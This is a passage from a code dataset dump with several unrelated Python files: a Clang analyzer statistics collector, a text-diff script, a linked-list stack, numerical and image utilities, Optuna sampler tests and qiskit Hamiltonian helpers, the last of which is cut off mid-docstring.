\"-Xclang\", \"checkercfg\",\n \"-Xclang\", \"-load\",\n \"-Xclang\", plugin])\n\n cmd.extend(['-Xclang',\n '-analyzer-opt-analyze-headers'])\n\n cmd.extend(config.analyzer_extra_arguments)\n cmd.extend(action.analyzer_options)\n\n # Enable the statistics collector checkers only.\n collector_checkers = []\n for checker_name, _ in config.checks().items():\n if SpecialReturnValueCollector.checker_collect in checker_name:\n collector_checkers.append(checker_name)\n\n if ReturnValueCollector.checker_collect in checker_name:\n collector_checkers.append(checker_name)\n\n if not collector_checkers:\n LOG.debug('No available statistics collector checkers were found')\n return [], False\n\n for coll_check in collector_checkers:\n cmd.extend(['-Xclang',\n '-analyzer-checker=' + coll_check])\n\n compile_lang = action.lang\n if not has_flag('-x', cmd):\n cmd.extend(['-x', compile_lang])\n\n if not has_flag('--target', cmd) and \\\n action.target.get(compile_lang, \"\") != \"\":\n cmd.append(\"--target=\" + action.target[compile_lang])\n\n if not has_flag('-std', cmd) and not has_flag('--std', cmd):\n cmd.append(action.compiler_standard.get(compile_lang, \"\"))\n\n cmd.extend(prepend_all(\n '-isystem',\n action.compiler_includes.get(compile_lang, [])))\n\n if source:\n cmd.append(source)\n return cmd, True\n\n\nclass SpecialReturnValueCollector(object):\n \"\"\"\n Collect special return value statistics.\n\n This script lists functions of which the return\n\n value is checked for negative (integers) or null (pointers).\n \"\"\"\n\n # Checker name used for pre analysis.\n checker_collect = 'statisticscollector.SpecialReturnValue'\n\n # Checker name which runs the analysis.\n checker_analyze = 'statisticsbased.SpecialReturnValue'\n\n def __init__(self, stats_min_sample_count,\n stats_relevance_threshold):\n\n self.stats_min_sample_count = stats_min_sample_count\n self.stats_relevance_threshold = stats_relevance_threshold\n # Matching these lines\n \"\"\"\"/.../x.c:551:12: warning:\n Special Return Value:/.../x.c:551:12,parsedate,0,0\n \"\"\"\n ptrn = \\\n r'.*warning: Special Return Value:'\\\n '.*:[0-9]*:[0-9]*.*,(.*),([0,1]),([0,1])'\n self.special_ret_val_regexp = re.compile(ptrn)\n\n # collected statistics\n self.stats = {\n 'total': defaultdict(int),\n 'nof_negative': defaultdict(int),\n 'nof_null': defaultdict(int)\n }\n\n @staticmethod\n def stats_file(path):\n return os.path.join(path, 'SpecialReturn.yaml')\n\n @staticmethod\n def checker_analyze_cfg(path):\n \"\"\"\n Return the checker config parameter for the analyzer checker.\n \"\"\"\n if not os.path.exists(SpecialReturnValueCollector.stats_file(path)):\n LOG.debug('No checker statistics file was found for %s',\n SpecialReturnValueCollector.checker_analyze)\n return []\n else:\n return ['-Xclang', '-analyzer-config',\n '-Xclang',\n 'alpha.ericsson.statisticsbased:APIMetadataPath=' + path]\n\n def total(self):\n return self.stats.get('total')\n\n def nof_null(self):\n return self.stats.get('nof_null')\n\n def nof_negative(self):\n return self.stats.get('nof_negative')\n\n def process_line(self, line):\n \"\"\"\n Match regex on the line\n \"\"\"\n m = self.special_ret_val_regexp.match(line)\n if m:\n func = m.group(1)\n ret_negative = m.group(2)\n ret_null = m.group(3)\n\n self.stats['total'][func] += 1\n self.stats['nof_negative'][func] += int(ret_negative)\n self.stats['nof_null'][func] += int(ret_null)\n\n def filter_stats(self):\n\n neg = []\n null = []\n stats = self.stats\n total = stats.get('total')\n\n for key in sorted(stats.get('total').keys()):\n negative_ratio = stats['nof_negative'][key]/stats['total'][key]\n if (self.stats_relevance_threshold < negative_ratio < 1 and\n total[key] >= self.stats_min_sample_count):\n neg.append(key)\n\n null_ratio = stats['nof_null'][key]/stats['total'][key]\n if (self.stats_relevance_threshold < null_ratio < 1 and\n total[key] >= self.stats_min_sample_count):\n null.append(key)\n return neg, null\n\n def get_yaml(self):\n \"\"\"\n FIXME proper yaml generation.\n \"\"\"\n stats_yaml = StringIO()\n\n stats_yaml.write(\"#\\n\")\n stats_yaml.write(\"# SpecialReturn metadata format 1.0\\n\")\n neg, null = self.filter_stats()\n\n for n in neg:\n stats_yaml.write(\n \"{name: \" + n + \", relation: LT, value: 0}\\n\")\n for n in null:\n stats_yaml.write(\n \"{name: \" + n + \", relation: EQ, value: 0}\\n\")\n\n return stats_yaml.getvalue()\n\n\nclass ReturnValueCollector(object):\n \"\"\"\n Collect return value statistics.\n This script lists functions of which the return value is mostly checked.\n \"\"\"\n\n # Checker name used for pre analysis.\n checker_collect = 'statisticscollector.ReturnValueCheck'\n\n # Checker name which runs the analysis.\n checker_analyze = 'statisticsbased.UncheckedReturnValue'\n\n def __init__(self, stats_min_sample_count,\n stats_relevance_threshold):\n\n self.stats_min_sample_count = stats_min_sample_count\n self.stats_relevance_threshold = stats_relevance_threshold\n # Matching these lines\n \"\"\"\n /.../x.c:551:12:\n warning: Return Value Check:/.../x.c:551:12,parsedate,0\n \"\"\"\n\n self.ret_val_regexp = \\\n re.compile(r'.*warning: Return Value Check:'\n '.*:[0-9]*:[0-9]*.*,(.*),([0,1])')\n\n self.stats = {'total': defaultdict(int),\n 'nof_unchecked': defaultdict(int)}\n\n @staticmethod\n def stats_file(path):\n return os.path.join(path, 'UncheckedReturn.yaml')\n\n @staticmethod\n def checker_analyze_cfg(path):\n \"\"\"\n Return the checker config parameter for the analyzer checker.\n \"\"\"\n if not os.path.exists(ReturnValueCollector.stats_file(path)):\n LOG.debug('No checker statistics file was found for %s',\n ReturnValueCollector.checker_analyze)\n return []\n else:\n return ['-Xclang', '-analyzer-config',\n '-Xclang',\n 'alpha.ericsson.statisticsbased:APIMetadataPath=' + path]\n\n def total(self):\n return self.stats.get('total')\n\n def nof_unchecked(self):\n return self.stats.get('nof_unchecked')\n\n def unchecked(self):\n return self.stats.get('unchecked')\n\n def process_line(self, line):\n \"\"\"\n Match regex on the line\n \"\"\"\n m = self.ret_val_regexp.match(line)\n if m:\n func = m.group(1)\n checked = m.group(2)\n self.stats['total'][func] += 1\n self.stats['nof_unchecked'][func] += int(checked)\n\n def filter_stats(self):\n \"\"\"\n Filter the collected statistics based on the threshold.\n Return a lisf of function names where the return value\n was unchecked above the threshold.\n \"\"\"\n unchecked_functions = []\n total = self.stats.get('total')\n for key in sorted(total):\n checked_ratio = 1 - \\\n self.stats['nof_unchecked'][key]/self.stats['total'][key]\n if (self.stats_relevance_threshold < checked_ratio < 1 and\n self.stats['total'][key] >= self.stats_min_sample_count):\n unchecked_functions.append(key)\n return unchecked_functions\n\n def get_yaml(self):\n \"\"\"\n FIXME proper yaml generation.\n \"\"\"\n stats_yaml = StringIO()\n\n stats_yaml.write(\"#\\n\")\n stats_yaml.write(\"# UncheckedReturn metadata format 1.0\\n\")\n for function_name in self.filter_stats():\n stats_yaml.write(\"- \" + function_name + '\\n')\n\n return stats_yaml.getvalue()\n\n\ndef postprocess_stats(clang_output_dir, stats_dir, stats_min_sample_count,\n stats_relevance_threshold):\n \"\"\"\n Read the clang analyzer outputs where the statistics emitter checkers\n were enabled and collect the statistics.\n\n After the statistics collection cleanup the output files.\n \"\"\"\n\n # Statistics yaml files will be stored in stats_dir\n try:\n os.stat(stats_dir)\n except Exception as ex:\n LOG.debug(ex)\n os.mkdir(stats_dir)\n\n if not os.path.exists(clang_output_dir):\n LOG.debug(\"No statistics directory was found\")\n return\n\n clang_outs = []\n try:\n for f in os.listdir(clang_output_dir):\n if os.path.isfile(os.path.join(clang_output_dir, f)):\n clang_outs.append(os.path.join(clang_output_dir, f))\n except OSError as oerr:\n LOG.debug(oerr)\n LOG.debug(\"Statistics can not be collected.\")\n LOG.debug(\"Analyzer output error.\")\n return\n\n if not clang_outs:\n LOG.warning(\"No output files were found to collect statistics.\")\n return\n ret_collector = ReturnValueCollector(stats_min_sample_count,\n stats_relevance_threshold)\n special_ret_collector =\\\n SpecialReturnValueCollector(stats_min_sample_count,\n stats_relevance_threshold)\n\n for clang_output in clang_outs:\n with open(clang_output, 'r') as out:\n clang_output = \"\"\n for line in out:\n clang_output += line + \"\\n\"\n ret_collector.process_line(line)\n special_ret_collector.process_line(line)\n LOG.debug(\"Collecting statistics finished.\")\n\n # Write out statistics.\n unchecked_yaml = ReturnValueCollector.stats_file(stats_dir)\n LOG.debug(\"Writing out statistics to %s\", unchecked_yaml)\n with open(unchecked_yaml, 'w') as uyaml:\n uyaml.write(ret_collector.get_yaml())\n\n special_ret_yaml = SpecialReturnValueCollector.stats_file(stats_dir)\n LOG.debug(\"Writing out statistics to %s\", special_ret_yaml)\n with open(special_ret_yaml, 'w') as uyaml:\n uyaml.write(special_ret_collector.get_yaml())\n","sub_path":"analyzer/codechecker_analyzer/analyzers/clangsa/statistics_collector.py","file_name":"statistics_collector.py","file_ext":"py","file_size_in_byte":11803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"430229937","text":"#!/usr/bin/python3.4\n# -*- coding=utf-8 -*-\n#本脚由亁颐堂现任明教教主编写,用于乾颐盾Python课程!\n#教主QQ:605658506\n#亁颐堂官网www.qytang.com\n#乾颐盾是由亁颐堂现任明教教主开发的综合性安全课程\n#包括传统网络安全(防火墙,IPS...)与Python语言和黑客渗透课程!\n\nfrom difflib import *\n\ndef diff_txt(file1,file2):\n\ttxt1 = open(file1, 'r').readlines()\n\ttxt2 = open(file2, 'r').readlines()\n\n\tresult = Differ().compare(txt1, txt2)\n\treturn_result = '\\n'.join(list(result))\n\treturn return_result\n\n\nif __name__ == '__main__':\n\tprint(diff_txt('IOU1.txt','IOU2.txt'))","sub_path":"Practice_Lab/diff_txt.py","file_name":"diff_txt.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"326563009","text":"'''\nOriginal by Ashish Ohri\nModified by Tarun M\nStacks\nThe following operations are performed by the stack in this module\nFunction name Description Return type\nPush(Key) adds key to the collection of stack None\nKeyTop() returns most recently added key String\nKeyPop() removes and returns most recently added key String\nIsEmpty() tells whether the stack is empty Boolean\nDisp() displays the stack List\n'''\n\nclass Stack:\n top=None\n def __init__(self,value):\n self.data=value\n self.next=None\n\ndef Push(Key):\n node=Stack(Key)\n if IsEmpty():\n Stack.top=node\n else:\n node.next=Stack.top\n Stack.top=node\n\ndef KeyTop():\n if IsEmpty():\n return \"Underflow\"\n \n return Stack.top.data\n\ndef KeyPop():\n if IsEmpty():\n return \"Underflow\"\n \n _=Stack.top\n Stack.top=Stack.top.next\n return _.data\n\ndef IsEmpty():\n return Stack.top is None\n\ndef Disp():\n if IsEmpty():\n print(None)\n else:\n temp=Stack.top\n while temp is not None:\n print(temp.data)\n temp=temp.next\n\n''' Menu driven stack implementation '''\n\n\nwhile True:\n print('->Menu \\n 1.Push \\n 2.KeyTop \\n 3.KeyPop \\n 4.Empty \\n 5.Disp \\n and 6. Quit')\n x=input('Enter your choice...')\n if x=='1':\n Push(int(input('Enter value to be pushed')))\n elif x=='2':\n print(KeyTop())\n elif x=='3':\n print(KeyPop())\n elif x=='4':\n print(Empty())\n elif x=='5':\n Disp()\n elif x=='6':\n break\n else:\n print(\"Incorrect choice...\")\n","sub_path":"PyStack.py","file_name":"PyStack.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"624052022","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport re\n\n\ndef SVD(X):\n # Return, U, Sigma, V such that X = U.Sigma.V^T\n U, Sigma, V = np.linalg.svd(X, full_matrices=False)\n # Careful, np.linalg.svd return U, sigma, transpose(V) --> V need to be transposed.\n return U, np.diag(Sigma), np.transpose(V)\n\n\ndef inverse_SVD(U, Sigma, V):\n # Returns U.Sigma.V^T\n # inverse_SVD(SVD(X)) should be equal to X\n temp = np.dot(Sigma, np.transpose(V))\n return np.dot(U, temp)\n\n\ndef get_all_conditions(individual):\n # Returns the list of all pgm files representing the individual if it exists (else, it should crash...)\n folder_path = \"data/YaleB-Dataset/images\"\n if individual < 4:\n \tindividual_path = folder_path + \"/yaleB0\" + str(individual)\n else:\n \tindividual_path = folder_path + \"/outliers\"\n\n files = os.listdir( individual_path )\n files = [f for f in files if '.pgm' in f]\n return files\n\n\ndef read_pgm(filename, byteorder='>'):\n # Return image data from a raw PGM file as numpy array.\n # Format specification: http://netpbm.sourceforge.net/doc/pgm.html\n # Credits : 'cgohlke' on https://stackoverflow.com/questions/7368739/numpy-and-16-bit-pgm\n with open(filename, 'rb') as f:\n buffer = f.read()\n try:\n header, width, height, maxval = re.search(\n b\"(^P.\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n]\\s)*)\", buffer).groups()\n except AttributeError:\n raise ValueError(\"Not a raw PGM file: '%s'\" % filename)\n return np.frombuffer(buffer,\n dtype='u1' if int(maxval) < 256 else byteorder+'u2',\n count=int(width)*int(height),\n offset=len(header)\n ).reshape((int(height), int(width)))\n\n\ndef load_image(individual, condition):\n # Load the image number 'condition' for the individual and returns it.\n folder_path = \"data/YaleB-Dataset/images\"\n if individual <4:\n \tindividual_path = folder_path + \"/yaleB0\" + str(individual)\n else:\n \tindividual_path = folder_path + \"/outliers\"\n files = get_all_conditions(individual)\n\n # assume condition= tau] -= tau\n X[X <= -tau] += tau\n return X\n\n\ndef flatten_picture(pict):\n return pict.ravel(), pict.shape[0], pict.shape[1]\n\n\ndef unflatten_picture(flat_pict, width, height):\n # unflatten_picture(flatten_picture(pict)) = pict\n return flat_pict.reshape(width, height)\n\n\ndef get_all_flat_pictures(individual):\n # Returns a matrix which lines are the flatten pictures of all individual\n files = get_all_conditions(individual)\n n = len(files)\n all_images = []\n for i in range(n):\n image = load_image(individual, i)\n image, width, height = flatten_picture(image)\n all_images.append(image)\n\n all_images = np.array(all_images)\n return all_images, width, height\n\n\ndef remove_values(X, p=0.2):\n # removes entries of X with probability p\n Omega = np.random.rand(X.shape[0], X.shape[1])\n Omega[Omega=p] = 1\n return X * Omega\n\n\ndef compute_L2_error(X, X_star):\n return np.sum((X - X_star)**2)\n\n\ndef compute_columnwise_L2(X, X_star):\n return np.sum((X - X_star)**2, axis = 1)\n\n\ndef plot_reconstruction(all_images, noisy_images, completed_images, condition, width, height, message=None):\n image = all_images[condition,:]\n image = unflatten_picture(image, width, height)\n noisy_image = noisy_images[condition, :]\n noisy_image = unflatten_picture(noisy_image, width, height)\n completed_image = completed_images[condition, :]\n completed_image = unflatten_picture(completed_image, width, height)\n\n plt.subplot(1,3,1)\n plt.imshow(image, plt.cm.gray)\n plt.title(\"Original Image\")\n\n plt.subplot(1,3,2)\n plt.imshow(noisy_image, plt.cm.gray)\n plt.title(\"Partially Destroyed Image\")\n\n plt.subplot(1,3,3)\n completed_image = np.maximum(0, np.minimum(completed_image, 255))\n plt.imshow(completed_image, plt.cm.gray)\n if message is None:\n plt.title(\"Reconstructed Image\")\n else:\n plt.title(message)\n plt.show()\n\n\ndef load_movie_ratings():\n with open('data/romance_horror.txt', 'r') as f:\n lines = f.read()\n\n # Let's build the rating matrix !\n users_cpt = 0; genre_1_cpt = 0; genre_2_cpt = 0; movies_cpt = 0\n # Create dictionaries to create new ids\n users = {}\n genre_1 = {}\n genre_2 = {}\n movies = {}\n\n lines = lines.split('\\n')\n for l in lines[1:]:\n l = l.split(',')\n user = l[0]\n genre = l[1]\n movie = l[2]\n if user not in users.keys():\n users[user] = users_cpt\n users_cpt += 1\n if genre == '1':\n if movie not in genre_1.keys():\n genre_1[movie] = genre_1_cpt\n movies[movie] = movies_cpt\n genre_1_cpt += 1\n movies_cpt += 1\n if genre == '2':\n if movie not in genre_2.keys():\n genre_2[movie] = genre_2_cpt\n genre_2_cpt += 1\n movies[movie] = movies_cpt\n movies_cpt += 1\n\n matrix_genre1 = np.zeros((users_cpt, genre_1_cpt))\n matrix_genre2 = np.zeros((users_cpt, genre_2_cpt))\n matrix_all_movies = np.zeros((users_cpt, movies_cpt))\n\n # Now, let's get the data to the matrices !\n\n for l in lines[1:]:\n l = l.split(',')\n user_id = users[l[0]]\n genre = l[1]\n rating = l[3]\n if genre == '1':\n genre1_id = genre_1[l[2]]\n movie_id = movies[l[2]]\n matrix_genre1[user_id, genre1_id] = float(rating)\n matrix_all_movies[user_id, movie_id] = float(rating)\n if genre == '2':\n genre2_id = genre_2[l[2]]\n movie_id = movies[l[2]]\n matrix_genre2[user_id, genre2_id] = float(rating)\n matrix_all_movies[user_id, movie_id] = float(rating)\n\n return matrix_genre1, matrix_genre2, matrix_all_movies\n\n\ndef split_train_test_netflix(data, p_train=0.8):\n W = np.sign(data)\n p_test = 1-p_train\n Omega = np.random.rand(data.shape[0], data.shape[1])\n Omega[Omega=p_test] = 1\n\n train = data * W * Omega # No need for W multiplication but it was added for clarity\n test = data * W * (1 - Omega)\n\n where_train = W * Omega\n where_test = W * (1-Omega)\n return train, test, where_train, where_test\n # where_train is equal to 1 where train values are non zero, where_test = 1 where test is equal to 1.\n\n\n\n\n\nif __name__==\"__main__\":\n \"\"\" Use this main function only to debug \"\"\"\n\n horror, romance, matrix_all_movies = load_movie_ratings()\n train, test, where_train, where_test = split_train_test_netflix(matrix_all_movies)\n\n ### Testing SVD\n X = np.array([[15,1,1], [1,20,1], [1,1,25]])\n print(\"X = \")\n print(X)\n U, Sigma, V = SVD(X)\n print(\"Sigma_X = \")\n print(Sigma)\n print(\"inverse_SVD(SVD(X)) = \")\n print(inverse_SVD(U, Sigma, V))\n\n # Testing loading\n image = load_image(2, 1)\n plt.imshow(image, plt.cm.gray)\n plt.show()\n\n # Testing Flatten and unflatten\n flat, width, height = flatten_picture(image)\n pict = unflatten_picture(flat, width, height)\n plt.imshow(pict, plt.cm.gray)\n plt.show()\n\n # Testing get_all_flat_pictures\n all_images, width, height = get_all_flat_pictures(1)\n noisy_images = remove_values(all_images, p=0.4)\n pict = noisy_images[0, :]\n pict = unflatten_picture(pict, width, height)\n plt.imshow(pict, plt.cm.gray)\n plt.show()\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":7932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"137729252","text":"from typing import Callable\nfrom unittest.mock import patch\n\nimport pytest\n\nimport optuna\nfrom optuna.integration import PyCmaSampler\nfrom optuna.integration import SkoptSampler\nfrom optuna.samplers import BaseSampler\nfrom optuna.testing.sampler import FirstTrialOnlyRandomSampler\n\n\nparametrize_sampler = pytest.mark.parametrize(\n \"sampler_class\", [optuna.integration.SkoptSampler, optuna.integration.PyCmaSampler]\n)\n\n\n@pytest.mark.parametrize(\n \"sampler_class\",\n [\n lambda: SkoptSampler(independent_sampler=FirstTrialOnlyRandomSampler()),\n lambda: PyCmaSampler(independent_sampler=FirstTrialOnlyRandomSampler()),\n ],\n)\ndef test_suggested_value(sampler_class: Callable[[], BaseSampler]) -> None:\n\n sampler = sampler_class()\n # direction='minimize'\n study = optuna.create_study(sampler=sampler, direction=\"minimize\")\n study.optimize(_objective, n_trials=10, catch=())\n for trial in study.trials:\n for param_name, param_value in trial.params.items():\n distribution = trial.distributions[param_name]\n param_value_in_internal_repr = distribution.to_internal_repr(param_value)\n assert distribution._contains(param_value_in_internal_repr)\n\n # direction='maximize'\n study = optuna.create_study(sampler=sampler, direction=\"maximize\")\n study.optimize(_objective, n_trials=10, catch=())\n for trial in study.trials:\n for param_name, param_value in trial.params.items():\n distribution = trial.distributions[param_name]\n param_value_in_internal_repr = distribution.to_internal_repr(param_value)\n assert distribution._contains(param_value_in_internal_repr)\n\n\n@parametrize_sampler\ndef test_sample_independent(sampler_class: Callable[[], BaseSampler]) -> None:\n\n sampler = sampler_class()\n study = optuna.create_study(sampler=sampler)\n\n # First trial.\n def objective0(trial: optuna.trial.Trial) -> float:\n\n p0 = trial.suggest_float(\"p0\", 0, 10)\n p1 = trial.suggest_float(\"p1\", 1, 10, log=True)\n p2 = trial.suggest_int(\"p2\", 0, 10)\n p3 = trial.suggest_float(\"p3\", 0, 9, step=3)\n p4 = trial.suggest_categorical(\"p4\", [\"10\", \"20\", \"30\"])\n assert isinstance(p4, str)\n return p0 + p1 + p2 + p3 + int(p4)\n\n with patch.object(sampler, \"sample_independent\") as mock_object:\n mock_object.side_effect = [1, 2, 3, 3, \"10\"]\n\n study.optimize(objective0, n_trials=1)\n\n # In first trial, all parameters were suggested via `sample_independent`.\n assert mock_object.call_count == 5\n\n # Second trial.\n def objective1(trial: optuna.trial.Trial) -> float:\n\n # p0, p2 and p4 are deleted.\n p1 = trial.suggest_float(\"p1\", 1, 10, log=True)\n p3 = trial.suggest_float(\"p3\", 0, 9, step=3)\n\n # p5 is added.\n p5 = trial.suggest_float(\"p5\", 0, 1)\n\n return p1 + p3 + p5\n\n with patch.object(sampler, \"sample_independent\") as mock_object:\n mock_object.side_effect = [0]\n\n study.optimize(objective1, n_trials=1)\n\n assert [call[1][2] for call in mock_object.mock_calls] == [\"p5\"]\n\n # Third trial.\n def objective2(trial: optuna.trial.Trial) -> float:\n\n p1 = trial.suggest_float(\"p1\", 50, 100, log=True) # The range has been changed\n p3 = trial.suggest_float(\"p3\", 0, 9, step=3)\n p5 = trial.suggest_float(\"p5\", 0, 1)\n\n return p1 + p3 + p5\n\n with patch.object(sampler, \"sample_independent\") as mock_object:\n mock_object.side_effect = [90, 0.2]\n\n study.optimize(objective2, n_trials=1)\n\n assert [call[1][2] for call in mock_object.mock_calls] == [\"p1\", \"p5\"]\n\n\n@pytest.mark.parametrize(\n \"sampler_class\",\n [\n lambda x: SkoptSampler(warn_independent_sampling=x),\n lambda x: PyCmaSampler(warn_independent_sampling=x),\n ],\n)\ndef test_warn_independent_sampling(sampler_class: Callable[[bool], BaseSampler]) -> None:\n\n # warn_independent_sampling=True\n sampler = sampler_class(True)\n study = optuna.create_study(sampler=sampler)\n\n class_name = \"optuna.integration.{}\".format(sampler.__class__.__name__)\n method_name = \"{}._log_independent_sampling\".format(class_name)\n\n with patch(method_name) as mock_object:\n study.optimize(\n lambda t: t.suggest_float(\"p0\", 0, 10) + t.suggest_float(\"q0\", 0, 10), n_trials=1\n )\n assert mock_object.call_count == 0\n\n with patch(method_name) as mock_object:\n study.optimize(\n lambda t: t.suggest_float(\"p1\", 0, 10) + t.suggest_float(\"q1\", 0, 10), n_trials=1\n )\n assert mock_object.call_count == 2\n\n # warn_independent_sampling=False\n sampler = sampler_class(False)\n study = optuna.create_study(sampler=sampler)\n\n with patch(method_name) as mock_object:\n study.optimize(\n lambda t: t.suggest_float(\"p0\", 0, 10) + t.suggest_float(\"q0\", 0, 10), n_trials=1\n )\n assert mock_object.call_count == 0\n\n with patch(method_name) as mock_object:\n study.optimize(\n lambda t: t.suggest_float(\"p1\", 0, 10) + t.suggest_float(\"q1\", 0, 10), n_trials=1\n )\n assert mock_object.call_count == 0\n\n\ndef _objective(trial: optuna.trial.Trial) -> float:\n\n p0 = trial.suggest_float(\"p0\", -3.3, 5.2)\n p1 = trial.suggest_float(\"p1\", 2.0, 2.0)\n p2 = trial.suggest_float(\"p2\", 0.0001, 0.3, log=True)\n p3 = trial.suggest_float(\"p3\", 1.1, 1.1, log=True)\n p4 = trial.suggest_int(\"p4\", -100, 8)\n p5 = trial.suggest_int(\"p5\", -20, -20)\n p6 = trial.suggest_float(\"p6\", 10, 20, step=2)\n p7 = trial.suggest_float(\"p7\", 0.1, 1.0, step=0.1)\n p8 = trial.suggest_float(\"p8\", 2.2, 2.2, step=0.5)\n p9 = trial.suggest_categorical(\"p9\", [\"9\", \"3\", \"0\", \"8\"])\n assert isinstance(p9, str)\n\n return p0 + p1 + p2 + p3 + p4 + p5 + p6 + p7 + p8 + int(p9)\n","sub_path":"tests/integration_tests/test_sampler.py","file_name":"test_sampler.py","file_ext":"py","file_size_in_byte":5853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"125738536","text":"import numpy as np\nfrom qiskit.opflow.primitive_ops import PauliOp\nfrom qiskit.opflow.list_ops import SummedOp\nfrom qiskit.quantum_info import Pauli\nfrom qiskit.opflow.primitive_ops.pauli_sum_op import PauliSumOp\nfrom qiskit.opflow.primitive_ops.tapered_pauli_sum_op import TaperedPauliSumOp\nfrom qiskit_nature.circuit.library import HartreeFock\nfrom qiskit_nature.transformers.second_quantization.electronic import FreezeCoreTransformer\nfrom qiskit_nature.problems.second_quantization.electronic import ElectronicStructureProblem\nfrom qiskit_nature.mappers.second_quantization import ParityMapper, JordanWignerMapper, BravyiKitaevMapper\nfrom qiskit_nature.converters.second_quantization.qubit_converter import QubitConverter\nfrom qiskit.opflow.primitive_ops import Z2Symmetries\nfrom qiskit_nature.drivers.second_quantization.pyquanted import PyQuanteDriver\nfrom IPython import get_ipython\n\ndef HeisenbergHamiltonian(J=1, H=1, num_qubits=2, neighbours=[(0, 1)]):\n\t\"\"\"\n\tQiskit operator of the 3-D Heisemberg Hamiltonian of a lattice of spins.\n\n\tH = - J Σ_j ( X_j X_{j+1} + Y_j Y_{j+1} + Z_j Z_{j+1} ) - H Σ_j Z_j\n\n\tParameters\n\t----------\n\tJ: float\n\t\tCoupling constant.\n\tH: float\n\t\tExternal magnetic field.\n\tnum_qubits: int.\n\t\tNumber of qubits.\n\tneighbours: list(tuples).\n\t\tCoupling between the spins.\n\n\tReturn\n\t------\n\tHamiltonian: SummedOp\n\t\tHeisenberg Hamiltonian of the system.\n\t\"\"\"\n\tnum_op = num_qubits + 3 * len(neighbours)\n\tHamiltonian_op_x = []\n\tHamiltonian_op_z = []\n\tHamiltonian_coef = num_qubits * [-H] + num_op * [-J]\n\n\tfor idx in range(num_qubits):\n\t\top_x = np.zeros(num_qubits)\n\t\top_z = np.zeros(num_qubits)\n\t\top_z[idx] = 1\n\t\tHamiltonian_op_x.append(op_x.copy())\n\t\tHamiltonian_op_z.append(op_z.copy())\n\n\tfor idx in neighbours:\n\t\top_x = np.zeros(num_qubits)\n\t\top_z = np.zeros(num_qubits)\n\t\top_x[idx[0]] = 1\n\t\top_x[idx[1]] = 1\n\t\tHamiltonian_op_x.append(op_x.copy())\n\t\tHamiltonian_op_z.append(op_z.copy())\n\t\top_z[idx[0]] = 1\n\t\top_z[idx[1]] = 1\n\t\tHamiltonian_op_x.append(op_x.copy())\n\t\tHamiltonian_op_z.append(op_z.copy())\n\t\top_x[idx[0]] = 0\n\t\top_x[idx[1]] = 0\n\t\tHamiltonian_op_x.append(op_x.copy())\n\t\tHamiltonian_op_z.append(op_z.copy())\n\n\tHamiltonian = SummedOp(\n\t\t[PauliOp(Pauli((Hamiltonian_op_z[j], Hamiltonian_op_x[j])), Hamiltonian_coef[j]) for j in range(num_op)])\n\n\treturn Hamiltonian\n\n\ndef RandomHamiltonian(num_qubits=2, num_paulis=4):\n\tidxs = np.random.randint(2, size=(2, num_qubits, num_paulis))\n\n\tHamiltonian = SummedOp([PauliOp(Pauli((idxs[0, :, j], idxs[1, :, j])), 1) for j in range(num_paulis)])\n\n\treturn Hamiltonian\n\n\ndef Label2Chain(QubitOp):\n\t\"\"\"\n\tTransform a string of Pauli matrices into a numpy array.\n\t'I' --> 0\n\t'X' --> 1\n\t'Y' --> 2\n\t'Z' --> 3\n\n\tParameters\n\t----------\n\tQubitOp: SummedOp.\n\n\tReturns\n\t-------\n\tops: ndarray(Pauli operators) (number_of_operators, number_of_qubits)\n\tcoef: list(float)\n\t\tCoefficients of each Pauli operator.\n\tlabel: list(str)\n\t\tPauli strings\n\t\"\"\"\n\tDict = {'I': 0,\n\t 'X': 1,\n\t 'Y': 2,\n\t 'Z': 3}\n\n\tif type(QubitOp) == PauliSumOp or type(QubitOp) == TaperedPauliSumOp:\n\t\tQubitOp = QubitOp.to_pauli_op()\n\n\tlabel = []\n\tops = []\n\tcoef = []\n\n\tfor idx in QubitOp.oplist:\n\t\tlabel_temp = idx.primitive.to_label()\n\t\tlabel.append(label_temp)\n\t\tops.append([Dict.get(idx) for idx in label_temp])\n\t\tcoef.append(idx.coeff)\n\n\treturn np.array(ops), coef, label\n\n\ndef from_string_to_numbers(pauli_labels):\n\t\"\"\"\n\tFunction that transform a set of pauli string from the str convention ('IXYZ'), to the number convention (0123).\n\n\tParameter\n\t---------\n\tpauli_labels: list\n\t\tList with the pauli string written as a string.\n\n\tReturn\n\t------\n\tPS: array\n\t\tPauli strings in the number convention.\n\t\"\"\"\n\tmap_str_int = {'I': 0, 'X': 1, 'Y': 2, 'Z': 3} # Map between str and int conventions\n\tPS = [] # Initialize the Pauli string for int convention\n\n\tfor label in pauli_labels: # Iterate over all the given pauli strings\n\t\ttemp = []\n\t\tfor letter in label: # Map each element of a Pauli string\n\t\t\ttemp.append(map_str_int[letter])\n\n\t\tPS.append(np.array(temp))\n\treturn np.array(PS)\n\n\ndef get_backend_conectivity(backend):\n\t\"\"\"\n\tGet the connected qubit of q backend. Has to be a quantum computer.\n\n\tParameters\n\t----------\n\tbackend: qiskit.backend\n\n\tReturn\n\t------\n\tconnexions: (list)\n\t\tList with the connected qubits\n\t\"\"\"\n\tdefaults = backend.defaults()\n\tconnexions = [indx for indx in defaults.instruction_schedule_map.qubits_with_instruction('cx')]\n\treturn connexions\n\n\ndef H2(distance=.761, freeze_core=True, remove_orbitals=False, initial_state=False, operator=True, mapper_type='ParityMapper'):\n\t\"\"\"\n\tQiskit operator of the LiH\n\n\tParameters\n\t----------\n\tdistance: float (optional)\n\t\tDistance between atoms of Li and H\n\tfreeze_core: Bool (optional)\n\t\tIf freeze some cores that do highly impact in the energy\n\tremove_orbitals: Bool (optional)\n\t\tRemove some orbitals that do no impact in the energy\n\tinitial_state: Bool (optional)\n\t\tReturn the 